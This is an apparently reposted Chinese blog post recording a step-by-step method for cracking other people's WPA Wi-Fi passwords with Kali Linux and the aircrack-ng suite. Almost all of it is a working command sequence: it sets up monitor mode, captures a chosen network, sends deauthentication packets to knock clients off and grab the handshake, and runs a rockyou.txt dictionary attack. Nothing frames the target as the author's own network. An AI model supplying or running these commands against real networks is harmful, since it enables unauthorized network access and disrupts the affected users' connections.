kali linux aircrack-ng 破解wifi 使用记录

来源:互联网 发布:天猫秒杀软件哪个好 编辑:程序博客网 时间:2024/05/01 10:52

简单了解了一下wifi破解的方法和原理,网上有很多这样的教程,这里只是做个记录,供自己以后查阅方便。

系统:kali linux (2016.1 version)
工具:aircrack-ng tools (kali 系统内置工具)
目标:wifi密码破解
步骤:具体如下
1.启动kali linux系统。可有三种方式启动
- 直接在电脑上安装kali linux,然后运行
- 将kali刻入光盘或移动硬盘,直接以live模式运行kali linux 镜像。
- 使用虚拟机(vmvare或virtualbox之类),按照以上任意两种方式运行kali
注:我使用的是将kali刻盘,然后以live模式启动的方式。因为在硬盘上安装kali比较费劲,使用虚拟机只能挂载USB 无线网卡,而无法挂载笔记本的内置无线网卡。另外,需保证你的无线网卡是支持monitor模式和injection的。

2.在命令行终端运行以下命令,具体含义不再详细解释,网上教程很详细

#停止当前网络服务> service network-manager stop#停止有可能影响破解结果的进程 > airmon-ng check kill#查看无线网卡配置,这一步会找到无线网卡的名字,比如wlan0> iwconfig#将无线网卡wlan0切换到monitor模式,如果网卡支持,网卡的名字会改变,比如从wlan0变为wlan0mon,如果网卡不支持,会有相关提示> airmon-ng start wlan0#使用wlan0mon,监听周围可用无线网络。#-a参数表示过滤掉所有unassociated的网络#在屏幕下方列表中出现你准备破解的无线信号的bssid和chanel后,ctrl+c停止当前命令> airodump-ng -a wlan0mon#单独监听准备破解的wifi, 假设需要监听的wifi的bssid=C4:4D:33:2B:5F:4A, chanel为11,则命令如下#tmp为保存dump数据的文件名,生成的捕获数据文件为tmp-01.cap#确保屏幕下方列表中有一个有效的station连接,并记录该station的id> airodump-ng --bbis C4:4D:33:2B:5F:4A -c 11 -w tmp wlan0mon#不要停止上面的监听命令,新开一个命令行终端,假设以上得到的station id=00:01:02:03:04:05, 则运行以下命令> aireplay-ng -0 2 -a C4:4D:33:2B:5F:4A -c 00:01:02:03:04:05#运行完以上命令后,查看在之前的airodump-ng的命令行是否出现wpa handshake的信息,如果出现,则说明成功取得包含密码的握手信息,否则过几分钟,重新执行aireplay-ng命令,如果一直不能成功握手,则建议换一个wifi#得到wpa handshake信息后,就可以停止上面的airodump-ng命令了,下面就是利用密码字典进行破解了。#在airodump-ng执行目录下,应该能找到tmp-01.cap文件#kali内置了一些密码字典,在/usr/share/wordlists/, 使用该路径下的rockyou.txt(该文件可能需要先解压)应该可以cover大部分常用密码,不过好的密码字典,尤其是符合中国人习惯和目前手机使用的,还需要自己设计。#在原来的airodump-ng命令行终端,运行以下命令> aircrack-ng tmp-01.cap -w /usr/share/wordlists/rockyou.txt#下面就是看运气了,如果找到密码,会出现found key [********]这样结果,否则会出现paraphrase not in dictonary的结果。
0 0
原创粉丝点击